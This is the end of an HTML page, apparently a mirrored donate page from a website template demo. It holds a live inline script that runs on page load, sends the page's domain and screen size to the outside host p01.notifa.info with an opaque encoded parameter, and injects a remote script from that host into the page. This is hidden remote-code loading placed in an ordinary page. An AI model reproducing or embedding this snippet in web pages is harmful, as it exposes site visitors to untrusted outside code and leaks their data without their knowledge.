<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2DxIKXzSOYDaXQ3bw%2bgV75JTONJYD%2fDqmMfWjqjS79SKLMt11qDO%2bWbqPFqbToFLZaFyIKIc4PhDPX5DTTgvFagZ3RbJgjsvc%2bfOcbFu2K7ym8DsSxHhWgbSDi8M0WfPjmjGua4meHvBWhzmpoTom7MKzR1ONVWZZts76ZR6vp1ov451eMC0mj7G%2fn0j6WFfII32CdyaC8Aiz7mr8U94ZtWpQuljYEaJH4INJFfSlAevkm%2bz77mo9g8RLqWxptmkdqefyy78Ll%2bc8nKbu%2fzR7ooEA5%2fRUZpD1oOsF2qIpXVH5gyZ6dMBZhw0derNRXNKVox%2bsZ82mEXpAd3XdVJkqE89y%2b005o5EBPvZaErZm9Jou30f%2buxxKv7VbICDckHhJcYTO1jTw48L%2bT7KIVSW1%2b2VAldVhStcPdSoYxv1Yt4hGohn8HxrEzKUQqLCFc2WpqtzB%2b4xvat%2byC62qll0vP0yi7H9AuWxlREcx5Na6Yw0ZJG9L6v1mkoPp51Tm0CiFe0LCK9NOEgM%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from demos.codexcoder.com/labartisan/html/GreenForest/donate.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Feb 2019 23:28:46 GMT -->
</html>
